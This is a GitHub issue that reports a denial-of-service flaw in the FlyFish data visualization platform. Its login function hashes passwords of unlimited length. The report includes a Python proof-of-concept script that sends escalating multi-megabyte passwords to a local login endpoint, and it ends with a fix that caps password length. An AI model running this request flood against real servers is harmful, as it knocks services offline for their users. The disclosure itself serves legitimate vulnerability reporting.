CloudWise-OpenSource / FlyFish

FlyFish is a data visualization coding platform. We can create a data model quickly in a simple way, and quickly generate a set of data visualization solutions by dragging.
https://cloudwise.ai/flyFish.html
GNU General Public License v3.0
764 stars 162 forks source link

Flyfish has a DDoS vulnerability #191

Open Lianghao-Chu opened 6 months ago

Lianghao-Chu commented 6 months ago

1. testing environment The testing environment is VMware Workstation: Seed Ubuntu 20.04 The version is as follows: 1

2. The vulnerability involves program code location and version number Vulnerability code location: ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.Java Test version: Flyfish open source version

3. Detailed report When capturing program login, registration, and other password design operations, we found that the client directly transmitted sensitive information such as usernames and passwords in plaintext, and operated on these information without restrictions. In the file ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.java includes functions for login, registration, and password modification. 2 3 Taking the login function as an example, it does not review some basic information and directly encrypts the transmitted password with MD5 encryption and compares it with database entries, but does not impose a maximum length limit on the password. Regardless of whether the incoming password is in plaintext or ciphertext form, attackers can construct packets and fill them with excessively long passwords. In the program's view, this long string is a password related field, forcing the system to perform the password hash process of long passwords, causing the server CPU and memory to run out, resulting in a denial of service attack on the server. This may cause the website to crash for a long time, meaning it is unusable or unresponsive.

4. POC 4.1 Environmental construction We use Docker to build the program. First, download the docker-compose.yml file from the Gitee community, and then execute the sudo docker-compose up -d command to build the environment. 4.2 Code logic We use Python language to simulate random long passwords by generating random long strings. Then, we sequentially send short and long passwords to the server to prove that the program's response time is normal. Long passwords are used to verify the existence of denial of service attacks in the program. While sending long passwords, we also log in to the correct account in the browser to verify that this attack did indeed cause server downtime. Please refer to the video for the browser login test. The video first shows the normal login time, and then simulates a denial of service attack. As the long password is transmitted, the server's CUP and memory gradually run out, and the user login time gradually increases until it crashes. In Attack_video, we simulated the login time extension caused by a longer password. And, we continued to increase the password length and demonstrated the scenario of the program not responding. 4.3 POC code The headers field in the code is the field obtained from the HTTP request packet during normal login using Wireshark packet capture.

import requests

url = "http://127.0.0.1:8089/#/flyfish/login"
headers = {"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64;rv:125.0) Gecko/20100101 Firefox/125.0","Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type":"applicationjson/json","Origin": "http://127.0.0.1:8089","Connection": "keep-alive", "Referer":"http://127.0.0.1:8089/"}

for i in [100,10000,20000,30000,40000,45000,80000]:
    passwd = "1574598741" * i * 1000
    data = {"name": "admin", "pass": f"{passwd}",}
    r = requests.post(url , headers=headers, data=data,timeout=999)
    print(f"密码长度:{i} 万")
    print("响应时间:",r.elapsed.total_seconds())
    print("-"*20)

4.4 POC results It can be seen that as the password length increases, the time for the server to process response requests also increases. Therefore, it can be seen that as long as the password is long enough, the server will also go down for a long time. The testing situation can be seen in the video. In Attack_video, we simulated the extension of login time caused by a longer password, and continued to increase the password length and demonstrated the scenario of the program not responding. 4

5. Repair plan One possible fix is to limit the length of input data within the frontend input box, while another possible fix is to add a maximum password length limit in BaseUserController or in login functions, registration functions, and other functions that involve password operations. In short, as long as the maximum length of the password is limited, this problem can be solved. 1

2